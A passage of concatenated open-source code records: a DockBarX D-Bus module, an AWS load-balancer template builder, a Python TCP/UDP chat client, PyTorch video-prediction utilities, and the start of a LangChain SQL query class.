path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by pid: %s\" % path_list)\n return path_list\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockManager\",\n in_signature=\"x\", out_signature=\"ao\",)\n def GetItemsByXid(self, xid):\n path_list = []\n for path in self.dockbar_r().get_dm_paths_by_xid(xid):\n path_list.append(dbus.ObjectPath(path))\n logger.debug(\"Items gotten by xid: %s\" % path_list)\n return path_list\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockManager',\n signature='o')\n def ItemAdded(self, obj_path):\n pass\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockManager',\n signature='o')\n def ItemRemoved(self, obj_path):\n pass\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ss', out_signature='v')\n def Get(self, interface_name, property_name):\n return self.GetAll(interface_name)[property_name]\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='s', out_signature='a{sv}')\n def GetAll(self, interface_name):\n if interface_name == \"net.launchpad.DockManager\":\n return {}\n else:\n raise dbus.exceptions.DBusException(\n 'com.example.UnknownInterface',\n 'The Foo object does not implement the %s interface'\n % interface_name)\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ssv', out_signature='')\n def Set(self, interface_name, property_name, property_value):\n pass\n\n @dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,\n signature='sa{sv}as')\n def PropertiesChanged(self, interface_name, changed_properties,\n invalidated_properties):\n pass\n\n def reset(self):\n try:\n bus = dbus.SessionBus()\n proxy = bus.get_object(\"net.launchpad.DockManager.Daemon\",\n \"/net/launchpad/DockManager/Daemon\")\n proxy.RestartAll(dbus_interface=\"net.launchpad.DockManager.Daemon\")\n except:\n logger.exception(\"Restarting DockManager Helpers failed.\")\n\n def remove(self):\n self.remove_from_connection()\n self.globals.disconnect(self.badge_sid)\n\nclass DockManagerItem(dbus.service.Object):\n counter = 0\n def __init__(self, groupbutton):\n self.groupbutton_r = weakref.ref(groupbutton)\n self.menu_counter = 0\n self.menu_items = ODict()\n self.globals = Globals()\n\n DockManagerItem.counter += 1\n self.obj_path = \"/net/launchpad/DockManager/Item\" + \\\n str(DockManagerItem.counter)\n bus_name = dbus.service.BusName(\"net.launchpad.DockManager\",\n bus = dbus.SessionBus())\n dbus.service.Object.__init__(self, bus_name, self.obj_path)\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"a{sv}\", out_signature=\"i\")\n def AddMenuItem(self, properties):\n self.menu_counter += 1\n id = self.menu_counter\n self.menu_items[id] = dict(properties)\n return id\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"i\", out_signature=\"\")\n def RemoveMenuItem(self, id):\n try:\n del self.menu_items[id]\n except KeyError:\n pass\n\n @dbus.service.method(dbus_interface=\"net.launchpad.DockItem\",\n in_signature=\"a{sv}\", out_signature=\"\")\n def UpdateDockItem(self, properties):\n group = groupbutton_r()\n if \"bagde\" in properties:\n group.button.set_badge(properties[\"badge\"], backend=\"dockmanager\")\n if \"progress\" in properties:\n progress = float(properties[\"progress\"])/100\n group.button.set_progress_bar(progress, backend=\"dockmanager\")\n if \"attention\" in properties:\n group.dm_attention = properties[\"attention\"]\n if group.needs_attention != group.dm_attention:\n group.needs_attention_changed()\n\n @dbus.service.signal(dbus_interface='net.launchpad.DockItem',\n signature='i')\n def MenuItemActivated(self, id):\n pass\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ss', out_signature='v')\n def Get(self, interface, propname):\n return self.GetAll(interface)[propname]\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='s', out_signature='a{sv}')\n def GetAll(self, interface):\n if interface == \"net.launchpad.DockItem\":\n path = self.groupbutton_r().get_desktop_entry_file_name()\n return { 'DesktopFile': path,\n 'Uri': ''\n }\n else:\n raise dbus.exceptions.DBusException(\n 'com.example.UnknownInterface',\n 'The Foo object does not implement the %s interface'\n % interface)\n\n @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,\n in_signature='ssv', out_signature='')\n def Set(self, interface, propname, value):\n pass\n\n @dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,\n signature='sa{sv}as')\n def PropertiesChanged(self, interface_name, changed_properties,\n invalidated_properties):\n pass\n\n def get_path(self):\n return self.obj_path\n\n def get_menu_items(self):\n return self.menu_items\n\n def remove(self):\n self.groupbutton_r().button.set_badge(None, backend=\"dockmanager\")\n self.groupbutton_r().button.set_progress_bar(None,\n backend=\"dockmanager\")\n self.remove_from_connection()\n","repo_name":"M7S/dockbarx","sub_path":"dockbarx/dockmanager.py","file_name":"dockmanager.py","file_ext":"py","file_size_in_byte":8872,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"83"} +{"seq_id":"16034911307","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport ecs_composex.common.troposphere_tools\n\nif TYPE_CHECKING:\n from ecs_composex.mods_manager import XResourceModule\n from ecs_composex.common.settings import ComposeXSettings\n\nfrom compose_x_common.compose_x_common import keyisset, keypresent, set_else_none\nfrom troposphere import AWS_NO_VALUE, AWS_STACK_NAME, GetAtt, Ref, Select, Sub, Tags\nfrom troposphere.ec2 import EIP, SecurityGroup\nfrom troposphere.elasticloadbalancingv2 import (\n LoadBalancer,\n LoadBalancerAttributes,\n SubnetMapping,\n)\n\nfrom ecs_composex.common import NONALPHANUM\nfrom ecs_composex.common.logging import LOG\nfrom ecs_composex.common.troposphere_tools import ROOT_STACK_NAME\nfrom ecs_composex.compose.x_resources.network_x_resources import NetworkXResource\nfrom ecs_composex.elbv2.elbv2_ecs import MergedTargetGroup\nfrom ecs_composex.elbv2.elbv2_params import (\n LB_ARN,\n LB_DNS_NAME,\n LB_DNS_ZONE_ID,\n LB_FULL_NAME,\n LB_NAME,\n LB_SG_ID,\n MOD_KEY,\n)\nfrom ecs_composex.elbv2.elbv2_stack.elbv2_listener import ComposeListener\nfrom ecs_composex.elbv2.elbv2_stack.helpers import (\n LISTENER_TARGET_RE,\n handle_cross_zone,\n handle_desync_mitigation_mode,\n handle_drop_invalid_headers,\n handle_http2,\n handle_timeout_seconds,\n validate_listeners_duplicates,\n)\nfrom ecs_composex.ingress_settings import Ingress, set_service_ports\nfrom ecs_composex.vpc.vpc_params import APP_SUBNETS, PUBLIC_SUBNETS, VPC_ID\n\n\nclass Elbv2(NetworkXResource):\n \"\"\"\n Class to handle ELBv2 creation and mapping to ECS Services\n \"\"\"\n\n subnets_param = APP_SUBNETS\n\n def __init__(\n self, name, definition, module: XResourceModule, settings: ComposeXSettings\n ):\n if not keyisset(\"Listeners\", definition):\n raise KeyError(\"You must specify at least one Listener for a LB.\", name)\n self.lb_is_public = False\n self.lb_type = \"application\"\n self.ingress = None\n self.lb_sg = None\n self.lb_eips = []\n self.unique_service_lb = False\n self.lb = None\n self.listeners: list[ComposeListener] = []\n self.target_groups: list[MergedTargetGroup] = []\n super().__init__(name, definition, module, settings)\n self.validate_services()\n self.sort_props()\n self.module_name = MOD_KEY\n self.ref_parameter = LB_ARN\n\n def init_outputs(self):\n self.output_properties = {\n LB_ARN: (self.logical_name, self.cfn_resource, Ref, None),\n LB_DNS_NAME: (\n f\"{self.logical_name}{LB_DNS_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_DNS_NAME.return_value,\n ),\n LB_DNS_ZONE_ID: (\n f\"{self.logical_name}{LB_DNS_ZONE_ID.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_DNS_ZONE_ID.return_value,\n ),\n LB_NAME: (\n f\"{self.logical_name}{LB_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_NAME.return_value,\n ),\n LB_FULL_NAME: (\n f\"{self.logical_name}{LB_FULL_NAME.return_value}\",\n self.cfn_resource,\n GetAtt,\n LB_FULL_NAME.return_value,\n ),\n }\n\n def set_listeners(self, template):\n \"\"\"\n Method to define the listeners\n :return:\n \"\"\"\n listeners: list[dict] = set_else_none(\"Listeners\", self.definition, [])\n if not listeners:\n raise KeyError(f\"You must define at least one listener for LB {self.name}\")\n ports = [listener[\"Port\"] for listener in listeners]\n validate_listeners_duplicates(self.name, ports)\n for listener_def in listeners:\n targets: list[dict] = set_else_none(\"Targets\", listener_def, [])\n if targets and self.services:\n for target in targets:\n target_parts = LISTENER_TARGET_RE.match(target[\"name\"])\n if not target_parts:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Listener {listener_def['Port']}\"\n f\" - Target {target['name']} is not a valid value. Must match\",\n LISTENER_TARGET_RE.pattern,\n )\n if (\n f\"{target_parts.group('family')}:{target_parts.group('container')}\"\n not in [svc[\"name\"] for svc in self.services]\n ):\n listener_def[\"Targets\"].remove(target)\n if keyisset(\"Targets\", listener_def) or keyisset(\n \"DefaultActions\", listener_def\n ):\n new_listener = template.add_resource(\n ComposeListener(self, listener_def)\n )\n self.listeners.append(new_listener)\n else:\n LOG.warning(\n f\"{self.module.res_key}.{self.name} - \"\n f\"Listener {listener_def['Port']} has no action or service. Not used.\"\n )\n\n def set_services_targets(self, settings):\n \"\"\"\n Method to map services and families targets of the services defined.\n TargetStructure:\n (family, family_wide, services[], access)\n\n :param ecs_composex.common.settings.ComposeXSettings settings:\n :return:\n \"\"\"\n if not self.services:\n LOG.debug(f\"{self.module.res_key}.{self.name} No Services defined.\")\n return\n for service_def in self.services:\n family_combo_name = service_def[\"name\"]\n service_name = family_combo_name.split(\":\")[-1]\n family_name = NONALPHANUM.sub(\"\", family_combo_name.split(\":\")[0])\n LOG.info(\n f\"{self.module.res_key}.{self.name} - Adding target {family_name}:{service_name}\"\n )\n if family_name not in settings.families:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Service family {family_name} is invalid. Defined families\",\n settings.families.keys(),\n )\n for f_service in settings.families[family_name].ordered_services:\n if f_service.name == service_name:\n if f_service not in settings.services:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} Please, use only the services names.\"\n \"You cannot use the family name defined by deploy labels\"\n f\"Found {f_service}\",\n [s for s in settings.services],\n [f for f in settings.families],\n )\n elif (\n f_service.name == service_name\n and f_service in settings.services\n and f_service not in self.families_targets\n ):\n self.families_targets.append(\n (\n f_service.family,\n f_service,\n service_def,\n f\"{service_def['name']}{service_def['port']}\",\n )\n )\n break\n else:\n raise ValueError(\n f\"{self.module.res_key}.{self.name} - Could not find {service_name} in family {family_name}\"\n )\n\n self.debug_families_targets()\n\n def validate_services(self):\n services_names = list({service[\"name\"] for service in self.services})\n if len(services_names) == 1:\n LOG.info(\n f\"LB {self.name} only has a unique service. LB will be deployed with the service stack.\"\n )\n self.unique_service_lb = True\n\n def sort_props(self):\n self.lb_is_public = (\n True\n if (\n keyisset(\"Scheme\", self.properties)\n and self.properties[\"Scheme\"] == \"internet-facing\"\n )\n else False\n )\n self.lb_type = (\n \"application\"\n if not keyisset(\"Type\", self.properties)\n else self.properties[\"Type\"]\n )\n self.sort_sg()\n\n def sort_sg(self):\n if self.is_nlb():\n self.lb_sg = Ref(AWS_NO_VALUE)\n elif self.is_alb():\n self.lb_sg = SecurityGroup(\n f\"{self.logical_name}SecurityGroup\",\n GroupDescription=Sub(\n f\"SG for LB {self.logical_name} in ${{{AWS_STACK_NAME}}}\"\n ),\n GroupName=Sub(\n f\"{self.logical_name}-{self.lb_type}-sg-${{{AWS_STACK_NAME}}}\"\n ),\n VpcId=Ref(VPC_ID),\n Tags=Tags(Name=Sub(f\"elbv2-{self.logical_name}-${{{AWS_STACK_NAME}}}\")),\n )\n\n def sort_alb_ingress(self, settings, stack_template):\n \"\"\"\n Method to handle Ingress to ALB\n \"\"\"\n if (\n not self.parameters\n or (self.parameters and not keyisset(\"Ingress\", self.parameters))\n or self.is_nlb()\n ):\n LOG.warning(\n \"You defined ingress rules for a NLB. This is invalid. Define ingress rules at the service level.\"\n )\n return\n elif not self.parameters or (\n self.parameters and not keyisset(\"Ingress\", self.parameters)\n ):\n LOG.warning(f\"You did not define any Ingress rules for ALB {self.name}.\")\n return\n ports = [listener[\"Port\"] for listener in self.definition[\"Listeners\"]]\n ports = set_service_ports(ports)\n self.ingress = Ingress(self.parameters[\"Ingress\"], ports)\n if self.ingress and self.is_alb():\n self.ingress.set_aws_sources_ingress(\n settings, self.logical_name, GetAtt(self.lb_sg, \"GroupId\")\n )\n self.ingress.set_ext_sources_ingress(\n self.logical_name, GetAtt(self.lb_sg, \"GroupId\")\n )\n self.ingress.associate_aws_ingress_rules(stack_template)\n self.ingress.associate_ext_ingress_rules(stack_template)\n\n def define_override_subnets(self, subnets, vpc_stack):\n \"\"\"\n Method to define the subnets overrides to use for the LB\n\n :param subnets: The original subnets to replace\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return: the subnet name to use\n :rtype: str\n \"\"\"\n if self.subnets_override:\n if self.subnets_override not in vpc_stack.vpc_resource.mappings.keys():\n raise KeyError(\n f\"The subnets indicated for {self.name} is not valid. Valid ones are\",\n vpc_stack.vpc_resource.mappings.keys(),\n )\n return self.subnets_override\n if isinstance(subnets, Ref):\n return subnets.data[\"Ref\"]\n return subnets\n\n def set_eips(self, vpc_stack):\n \"\"\"\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return:\n \"\"\"\n if self.is_nlb() and self.lb_is_public:\n if vpc_stack.vpc_resource.cfn_resource:\n for public_subnet in vpc_stack.vpc_resource.public_subnets[1]:\n self.lb_eips.append(\n EIP(\n f\"{self.logical_name}Eip{public_subnet.title}\",\n Domain=\"vpc\",\n )\n )\n elif vpc_stack.vpc_resource.mappings:\n subnets = self.define_override_subnets(PUBLIC_SUBNETS.title, vpc_stack)\n for public_az in vpc_stack.vpc_resource.mappings[subnets][\"Azs\"]:\n self.lb_eips.append(\n EIP(\n f\"{self.logical_name}Eip{public_az.title().split('-')[-1]}\",\n Domain=\"vpc\",\n )\n )\n\n def set_subnets(self, vpc_stack):\n \"\"\"\n Method to define which subnets to use for the\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :return:\n \"\"\"\n if (\n self.subnets_override\n and vpc_stack.vpc_resource.cfn_resource\n and self.subnets_override\n not in [\n PUBLIC_SUBNETS.title,\n APP_SUBNETS.title,\n ]\n ):\n raise ValueError(\n \"When Compose-X creates the VPC, the only subnets you can define to use are\",\n [PUBLIC_SUBNETS.title, APP_SUBNETS.title],\n )\n if self.is_nlb() and self.lb_is_public:\n return Ref(AWS_NO_VALUE)\n if (\n self.subnets_override\n and not vpc_stack.vpc_resource.cfn_resource\n and vpc_stack.vpc_resource.mappings\n and self.subnets_override in vpc_stack.vpc_resource.mappings.keys()\n ):\n return Ref(self.subnets_override)\n elif self.lb_is_public:\n return Ref(PUBLIC_SUBNETS)\n return Ref(APP_SUBNETS)\n\n def set_subnet_mappings(self, vpc_stack):\n \"\"\"\n For NLB, defines the EC2 EIP and Subnets Mappings to use.\n Determines the number of EIP to produce from the VPC Settings.\n \"\"\"\n if self.is_alb():\n return Ref(AWS_NO_VALUE)\n if not self.lb_eips and self.lb_is_public:\n self.set_eips(vpc_stack)\n mappings = []\n subnets = self.define_override_subnets(PUBLIC_SUBNETS.title, vpc_stack)\n for count, eip in enumerate(self.lb_eips):\n mappings.append(\n SubnetMapping(\n AllocationId=GetAtt(eip, \"AllocationId\"),\n SubnetId=Select(count, Ref(subnets)),\n )\n )\n return mappings\n elif not self.lb_is_public:\n self.cfn_resource.Subnets = self.set_subnets(vpc_stack)\n return Ref(AWS_NO_VALUE)\n\n def parse_attributes_settings(self):\n \"\"\"\n Method to parse pre-defined settings for shortcuts\n\n :return: the lb attributes mappings\n :rtype: list\n \"\"\"\n valid_settings = [\n (\"timeout_seconds\", int, handle_timeout_seconds, self.is_alb()),\n (\n \"desync_mitigation_mode\",\n str,\n handle_desync_mitigation_mode,\n self.is_alb(),\n ),\n (\n \"drop_invalid_header_fields\",\n bool,\n handle_drop_invalid_headers,\n self.is_alb(),\n ),\n (\"http2\", bool, handle_http2, self.is_alb()),\n (\"cross_zone\", bool, handle_cross_zone, self.is_nlb()),\n ]\n mappings = []\n for setting in valid_settings:\n if (\n keypresent(setting[0], self.parameters)\n and isinstance(self.parameters[setting[0]], setting[1])\n and setting[3]\n ):\n if setting[2] and setting[3]:\n mappings.append(setting[2](self.parameters[setting[0]]))\n elif setting[3]:\n mappings.append(\n LoadBalancerAttributes(\n Key=setting[0],\n Value=str(self.parameters[setting[0]]),\n )\n )\n return mappings\n\n def set_lb_attributes(self):\n \"\"\"\n Method to define the LB attributes\n\n :return: List of LB Attributes\n :rtype: list\n \"\"\"\n attributes = []\n if keyisset(\"LoadBalancerAttributes\", self.properties):\n for prop in self.properties[\"LoadBalancerAttributes\"]:\n attributes.append(\n LoadBalancerAttributes(\n Key=prop,\n Value=self.properties[\"LoadBalancerAttributes\"][prop],\n )\n )\n elif (\n not keyisset(\"LoadBalancerAttributes\", self.definition) and self.parameters\n ):\n attributes = self.parse_attributes_settings()\n if attributes:\n return attributes\n return Ref(AWS_NO_VALUE)\n\n def set_lb_definition(self):\n \"\"\"\n Function to parse the LB settings and properties and build the LB object\n\n :param ecs_composex.common.settings.ComposeXSettings settings:\n \"\"\"\n attrs = {\n \"IpAddressType\": \"ipv4\"\n if not keyisset(\"IpAddressType\", self.properties)\n else self.properties[\"IpAddressType\"],\n \"Type\": self.lb_type,\n \"Scheme\": \"internet-facing\" if self.lb_is_public else \"internal\",\n \"SecurityGroups\": [Ref(self.lb_sg)]\n if isinstance(self.lb_sg, SecurityGroup)\n else self.lb_sg,\n \"Subnets\": Ref(AWS_NO_VALUE),\n \"SubnetMappings\": Ref(AWS_NO_VALUE),\n \"LoadBalancerAttributes\": self.set_lb_attributes(),\n \"Tags\": Tags(Name=Sub(f\"${{{ROOT_STACK_NAME.title}}}{self.logical_name}\")),\n \"Name\": Ref(AWS_NO_VALUE),\n }\n self.lb = LoadBalancer(self.logical_name, **attrs)\n self.cfn_resource = self.lb\n\n def is_nlb(self):\n return True if self.lb_type == \"network\" else False\n\n def is_alb(self):\n return True if self.lb_type == \"application\" else False\n\n def associate_to_template(self, template):\n \"\"\"\n Method to associate all resources to the template\n\n :param troposphere.Template template:\n :return:\n \"\"\"\n template.add_resource(self.lb)\n self.init_outputs()\n if self.lb_sg and isinstance(self.lb_sg, SecurityGroup):\n self.output_properties.update(\n {\n LB_SG_ID: (\n f\"{self.logical_name}{LB_SG_ID.return_value}\",\n self.lb_sg,\n GetAtt,\n LB_SG_ID.return_value,\n None,\n )\n }\n )\n template.add_resource(self.lb_sg)\n for eip in self.lb_eips:\n template.add_resource(eip)\n self.generate_outputs()\n\n def update_from_vpc(self, vpc_stack, settings=None):\n \"\"\"\n Override to set the specific resources right once we have a VPC Definition\n\n :param ecs_composex.vpc.vpc_stack.VpcStack vpc_stack:\n :param ecs_composex.common.settings.ComposeXSettings settings:\n \"\"\"\n if vpc_stack and vpc_stack.vpc_resource:\n if self.is_alb():\n self.cfn_resource.Subnets = self.set_subnets(vpc_stack)\n elif self.is_nlb():\n self.cfn_resource.SubnetMappings = self.set_subnet_mappings(vpc_stack)\n","repo_name":"compose-x/ecs_composex","sub_path":"ecs_composex/elbv2/elbv2_stack/elbv2.py","file_name":"elbv2.py","file_ext":"py","file_size_in_byte":19192,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"62"} +{"seq_id":"24791684608","text":"import socket\r\nimport threading\r\nimport random\r\nimport os\r\n\r\n\r\ndef tcpclient():\r\n\r\n nickname = input(\"Choose your nickname: \")\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.connect(('127.0.0.1', 5008))\r\n\r\n def receive():\r\n while True:\r\n try:\r\n\r\n message = client.recv(1024).decode('ascii')\r\n if message == 'NICK':\r\n client.send(nickname.encode('ascii'))\r\n else:\r\n print(message)\r\n except:\r\n\r\n print(\"An error occured!\")\r\n client.close()\r\n break\r\n\r\n def write():\r\n while True:\r\n data = input()\r\n\r\n message = '{}: {}'.format(nickname, data)\r\n\r\n client.send(message.encode('ascii'))\r\n\r\n receive_thread = threading.Thread(target=receive)\r\n receive_thread.start()\r\n\r\n write_thread = threading.Thread(target=write)\r\n write_thread.start()\r\n\r\n\r\ndef udpClient():\r\n # Client Code\r\n def ReceiveData(sock):\r\n while True:\r\n try:\r\n data, addr = sock.recvfrom(1024)\r\n print(data.decode('utf-8'))\r\n except:\r\n pass\r\n\r\n def RunClient(serverIP):\r\n host = socket.gethostbyname(socket.gethostname())\r\n port = random.randint(6000, 10000)\r\n print('Client IP->' + str(host) + ' Port->' + str(port))\r\n server = (str(serverIP), 5000)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.bind((host, port))\r\n\r\n name = input('Choose your Nickname: ')\r\n if name == '':\r\n name = 'Guest' + str(random.randint(1000, 9999))\r\n print('Nickname:' + name)\r\n s.sendto(name.encode('utf-8'), server)\r\n threading.Thread(target=ReceiveData, args=(s,)).start()\r\n while True:\r\n\r\n data = input()\r\n if data == 'quit':\r\n break\r\n elif data == '':\r\n continue\r\n data = '[' + name + ']' + ' : ' + data\r\n s.sendto(data.encode('utf-8'), server)\r\n s.sendto(data.encode('utf-8'), server)\r\n s.close()\r\n os._exit(1)\r\n\r\n hostname = socket.gethostname()\r\n local_ip = socket.gethostbyname(hostname)\r\n RunClient(local_ip)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n prot = str(input('Escolha o protocolo à ser executado no cliente(udp/tcp):'))\r\n if prot == 'udp':\r\n print('Protocolo UDP está sendo executado')\r\n udpClient()\r\n else:\r\n print('Protocolo TCP está sendo executado')\r\n tcpclient()\r\n","repo_name":"xelel/chat-cliente-server","sub_path":"tcp udp chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7998738220","text":"import math\nfrom operator import pos\nimport imageio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom PIL import Image, ImageDraw\nfrom scipy import signal\nfrom skimage.metrics import peak_signal_noise_ratio as psnr_metric\nfrom skimage.metrics import structural_similarity as ssim_metric\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport torchvision.transforms as T\n\n\ndef kl_criterion(mu, logvar, args):\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n KLD /= args.batch_size \n return KLD\n \ndef eval_seq(gt, pred):\n T = len(gt)\n bs = gt[0].shape[0]\n ssim = np.zeros((bs, T))\n psnr = np.zeros((bs, T))\n mse = np.zeros((bs, T))\n for i in range(bs):\n for t in range(T):\n origin = gt[t][i]\n predict = pred[t][i]\n for c in range(origin.shape[0]):\n ssim[i, t] += ssim_metric(origin[c], predict[c]) \n psnr[i, t] += psnr_metric(origin[c], predict[c])\n ssim[i, t] /= origin.shape[0]\n psnr[i, t] /= origin.shape[0]\n mse[i, t] = mse_metric(origin, predict)\n\n return mse, ssim, psnr\n\ndef mse_metric(x1, x2):\n err = np.sum((x1 - x2) ** 2)\n err /= float(x1.shape[0] * x1.shape[1] * x1.shape[2])\n return err\n\n# ssim function used in Babaeizadeh et al. (2017), Fin et al. (2016), etc.\ndef finn_eval_seq(gt, pred):\n T = len(gt)\n bs = gt[0].shape[0]\n\n ssim = np.zeros((bs, T))\n psnr = np.zeros((bs, T))\n mse = np.zeros((bs, T))\n for i in range(bs):\n for t in range(T):\n origin = gt[t][i].detach().cpu().numpy()\n predict = pred[t][i].detach().cpu().numpy()\n for c in range(origin.shape[0]):\n res = finn_ssim(origin[c], predict[c]).mean()\n if math.isnan(res):\n ssim[i, t] += -1\n else:\n ssim[i, t] += res\n psnr[i, t] += finn_psnr(origin[c], predict[c])\n ssim[i, t] /= origin.shape[0]\n psnr[i, t] /= origin.shape[0]\n mse[i, t] = mse_metric(origin, predict)\n\n return mse, ssim, psnr\n\ndef finn_psnr(x, y, data_range=1.):\n mse = ((x - y)**2).mean()\n return 20 * math.log10(data_range) - 10 * math.log10(mse)\n\ndef fspecial_gauss(size, sigma):\n x, y = np.mgrid[-size // 2 + 1:size // 2 + 1, -size // 2 + 1:size // 2 + 1]\n g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2)))\n return g / g.sum()\n\ndef finn_ssim(img1, img2, data_range=1., cs_map=False):\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n size = 11\n sigma = 1.5\n window = fspecial_gauss(size, sigma)\n\n K1 = 0.01\n K2 = 0.03\n\n C1 = (K1 * data_range) ** 2\n C2 = (K2 * data_range) ** 2\n mu1 = signal.fftconvolve(img1, window, mode='valid')\n mu2 = signal.fftconvolve(img2, window, mode='valid')\n mu1_sq = mu1*mu1\n mu2_sq = mu2*mu2\n mu1_mu2 = mu1*mu2\n sigma1_sq = signal.fftconvolve(img1*img1, window, mode='valid') - mu1_sq\n sigma2_sq = signal.fftconvolve(img2*img2, window, mode='valid') - mu2_sq\n sigma12 = signal.fftconvolve(img1*img2, window, mode='valid') - mu1_mu2\n\n if cs_map:\n return (((2 * mu1_mu2 + C1) * (2 * sigma12 + C2))/((mu1_sq + mu2_sq + C1) *\n (sigma1_sq + sigma2_sq + C2)), \n (2.0 * sigma12 + C2) / (sigma1_sq + sigma2_sq + C2))\n else:\n return ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) *\n (sigma1_sq + sigma2_sq + C2))\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 or classname.find('Linear') != -1:\n m.weight.data.normal_(0.0, 0.02)\n m.bias.data.fill_(0)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\ndef normalize_data(seq):\n seq = seq.transpose(0, 1) #將seq[0] seq[1]轉至,\n return seq\n\ndef pred(validate_seq, validate_cond, modules, args):\n x = validate_seq\n cond = validate_cond\n # initialize the hidden state.\n modules['frame_predictor'].hidden = modules['frame_predictor'].init_hidden()\n\n with torch.no_grad(): \n \n x_pred_list=[x[0]]\n \n for i in range(1, args.n_past + args.n_future):\n\n x_t_last = x_pred_list[i-1]\n\n if i < args.n_past:\n h_t_last,skip = modules['encoder'](x_t_last)\n else:\n h_t_last,_ = modules['encoder'](x_t_last)\n \n z_t = torch.cuda.FloatTensor(args.batch_size,args.z_dim).normal_()\n\n # position\n g_t = modules['frame_predictor'](torch.cat([cond[i],h_t_last, z_t], 1))\n x_pred = modules['decoder']([g_t, skip])\n x_pred_list.append(x_pred)\n \n return x_pred_list\n\n\ndef plot_img(fname,img_seq):\n transform = T.ToPILImage()\n \n sample = len(img_seq)\n time = len(img_seq[0])\n bg = Image.new('RGB',(time*64, sample*64), '#000000')\n for s in range(sample):\n for t in range(time):\n img = transform(img_seq[s][t]) \n \n x = (t) % time \n y = (s) % sample # 根據開啟的順序,決定 x 座標\n bg.paste(img,(x*64, y*64)) # 貼上圖片\n\n bg.save(fname)\ndef plot_gif(fname,img_seq):\n transform = T.ToPILImage()\n sample = len(img_seq)\n time = len(img_seq[0])\n gif = []\n for t in range(time):\n g_bg = Image.new('RGB',(sample*64,64), '#000000')\n\n for s in range(sample):\n img = transform(img_seq[s][t]) \n x = (s) % 30 \n g_bg.paste(img,(x*64,0))\n gif.append(g_bg)\n g_bg.save(fname, save_all=True, append_images=gif[0:], optimize=False, duration=100, loop=0)\n\ndef plot_pred(validate_seq,gen, epoch, args):\n sample = 0\n plot_list = [[],[]]\n for t in range(len(gen)):\n plot_list[0].append(validate_seq[t][sample])\n plot_list[1].append(gen[t][sample])\n plot_img(f\"{args.log_dir}/gen/Eopoch_{epoch}.jpg\",plot_list)\n plot_gif(f\"{args.log_dir}/gen/Epoch_{epoch}.gif\",plot_list)\n \n \n\n\n \n\n\n","repo_name":"OuTingYun/DeepLearning-NYCU","sub_path":"Lab4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"18237564099","text":"import os\nimport openai\nimport pandas as pd\nfrom dotenv import load_dotenv\nimport mysql.connector as connection \nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.agents import create_sql_agent\nfrom langchain.sql_database import SQLDatabase\nfrom langchain.agents.agent_toolkits import SQLDatabaseToolkit\n\nload_dotenv()\nos.environ['OPENAI_API_KEY'] = os.getenv('OPENAI_KEY')\nopenai.api_key = os.getenv('OPENAI_KEY')\n\nclass SQLQuerywithLangchain:\n def __init__(self):\n self.DB_USERNAME = os.getenv('DB_USERNAME')\n self.DB_PASSWORD = os.getenv('DB_PASSWORD')\n self.DB_HOST = os.getenv('DB_HOST')\n self.DB_PORT = os.getenv('DB_PORT')\n self.DB_NAME = os.getenv('DB_NAME')\n\n def createDBConnectionString(self):\n db_user = self.DB_USERNAME\n db_Password = self.DB_PASSWORD\n db_host = self.DB_HOST + self.DB_PORT\n db_name = self.DB_NAME\n connectionString = f\"mysql+pymysql://{db_user}:{db_Password}@{db_host}/{db_name}\"\n return connectionString\n \n def getSQLSchema(self):\n ''''\n Extracting the schema info from the MySQL database and passing the schema \n information to the prompt.\n '''\n sql_query = f\"\"\" \n SELECT C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, T.TABLE_TYPE, T.TABLE_SCHEMA \n FROM 